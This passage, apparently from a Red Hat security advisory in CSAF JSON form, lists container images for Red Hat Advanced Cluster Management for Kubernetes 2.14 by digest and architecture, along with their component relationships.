"purl": "pkg:oci/subctl-rhel9@sha256%3A5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/subctl-rhel9\u0026tag=1780238563"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"product_id": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"product_identification_helper": {
"purl": "pkg:oci/submariner-gateway-rhel9@sha256%3A7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/submariner-gateway-rhel9\u0026tag=1780204887"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"product_id": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/submariner-globalnet-rhel9@sha256%3A2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/submariner-globalnet-rhel9\u0026tag=1780204696"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"product_id": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"product_identification_helper": {
"purl": "pkg:oci/submariner-rhel9-operator@sha256%3A01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/submariner-rhel9-operator\u0026tag=1780204322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"product_id": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"product_identification_helper": {
"purl": "pkg:oci/submariner-route-agent-rhel9@sha256%3A30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2/submariner-route-agent-rhel9\u0026tag=1780204631"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"product_id": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-agent-rhel9@sha256%3A6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-agent-rhel9\u0026tag=1780204232"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"product_id": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"product_identification_helper": {
"purl": "pkg:oci/lighthouse-coredns-rhel9@sha256%3Ae802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/lighthouse-coredns-rhel9\u0026tag=1780204249"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"product_id": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"product_identification_helper": {
"purl": "pkg:oci/nettest-rhel9@sha256%3A831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/nettest-rhel9\u0026tag=1780241410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"product_id": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"product_identification_helper": {
"purl": "pkg:oci/subctl-rhel9@sha256%3Aa154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/subctl-rhel9\u0026tag=1780238563"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"product_id": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-gateway-rhel9@sha256%3A2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/submariner-gateway-rhel9\u0026tag=1780204887"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"product_id": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-globalnet-rhel9@sha256%3Abe69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/submariner-globalnet-rhel9\u0026tag=1780204696"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"product_id": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-rhel9-operator@sha256%3A60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/submariner-rhel9-operator\u0026tag=1780204322"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"product_id": "registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-route-agent-rhel9@sha256%3A83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2/submariner-route-agent-rhel9\u0026tag=1780204631"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.14"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.14",
